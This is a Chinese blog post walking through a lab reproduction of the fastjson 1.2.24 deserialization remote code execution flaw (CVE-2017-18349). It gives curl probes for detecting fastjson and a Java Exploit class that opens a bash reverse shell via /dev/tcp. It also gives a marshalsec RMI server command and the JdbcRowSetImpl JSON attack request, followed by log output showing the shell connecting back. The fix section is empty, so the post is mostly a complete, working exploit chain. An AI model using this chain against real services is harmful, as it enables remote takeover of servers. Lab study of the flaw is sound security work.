美文网首页
fastjson 1.2.24 反序列化

fastjson 1.2.24 反序列化

作者: Watanuki | 来源:发表于2020-07-18 22:46 被阅读0次

    漏洞背景

    • fastjson<=1.2.24,CVE-2017-18349,前台无回显RCE
      fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
    • fastjson<=1.2.47,前台无回显RCE
      fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。

    java不熟。。。跳过原理分析,了解到这里就算了OTZ

    漏洞特征

    1. 如果站点有原始报错回显,可以用不闭合花括号的方式进行报错回显,报错中往往会有fastjson的字样.(vulhub环境不适用)。curl http://10.154.7.128:8090/ -H "Content-Type: application/json" --data '{"name":"success", "age":20'
    2. 可以通过DNS回显的方式检测后端是否使用Fastjson。curl http://10.154.7.128:8090/ -H "Content-Type: application/json" --data '{{"@type":"java.net.URL","val":"dnslog"}:0'
    3. Java 系 Json 处理基本只有 Fastjson 和 Jackson,追加一个随机 key时jackson会报错。
    4. 对使用fastjson的。Fastjson < 1.2.60 在取不到值的时候会填充 \u001a ,在1.2.60 进行了修复, 对 \x 后面的字符进行是否为16进制允许字符 (0-9a-fA-F) 的校验,所以这里就可以手动 padding ,构造一个特殊的字符串。

    以上这串我也没看懂,后来大佬跟我说看到json的就打一下,反正不吃亏。。。。我觉得挺有道理的。

    本地复现

    • fastjson/1.2.24-rce
    • fastjson/1.2.47-rce
    # 本地攻击机,目标机10.154.7.128:28764,远程类http://167.71.218.107/Exploit.class,控制机10.154.7.128:53
    root@ninomi:~# curl http://10.154.7.128:8090/ #访问8090端口即可看到JSON格式的输出
    {
            "age":25,
            "name":"Bob"
    root@ninomi:~# curl http://10.154.7.128:8090/ -H "Content-Type: application/json" --data '{"name":"success", "age":20}' #传入的json字段被解析
    {
            "age":20,
            "name":"success"
    }
    #编译以下代码,放在web目录下可访问。kali里版本是javac 11.0.5会出错。在centos下yum install java-1.8.0-openjdk* -y后编译。
    //javac  Exploit.java
    public class Exploit {
        public Exploit(){
            try{
                Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/10.154.7.128/53 0>&1");
            }catch(Exception e){
                e.printStackTrace();
            }
        }
        public static void main(String[] argv){
            Exploit e = new Exploit();
        }
    }
    #启动一个RMI服务器,监听9999端口,并指定加载远程类Exploit.class
    #java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://167.71.218.107/#Exploit" 9999
    * Opening JRMP listener on 9999
    

    本地bp发攻击包

    POST / HTTP/1.1
    Host: 10.154.7.128:28764
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/json
    Content-Length: 166
    
    {
        "b":{
            "@type":"com.sun.rowset.JdbcRowSetImpl",
            "dataSourceName":"rmi://10.154.7.128:9999/Exploit",
            "autoCommit":true
        }
    }
    

    本地listen获得反弹shell

    Have connection from /10.0.6.2:36644
    Reading message...
    Is RMI.lookup call for Exploit 2
    Sending remote classloading stub targeting http://167.71.218.107/Exploit.class
    Closing connection
    # 本地listen53端口拿到反弹shell
    

    漏洞修复

    参考资料

    总结

    1. 编译时要注意openjdk版本需要是1.8
      2.远程类文件后面不能带参数(payload就是这么死,会在后面补上.class。。。)
    2. 但是为什么rmi服务器这里必须加载远程类而不能加载本地类呢…………………………

    相关文章

      网友评论

          本文标题:fastjson 1.2.24 反序列化

          本文链接:https://www.haomeiwen.com/subject/bcwcfktx.html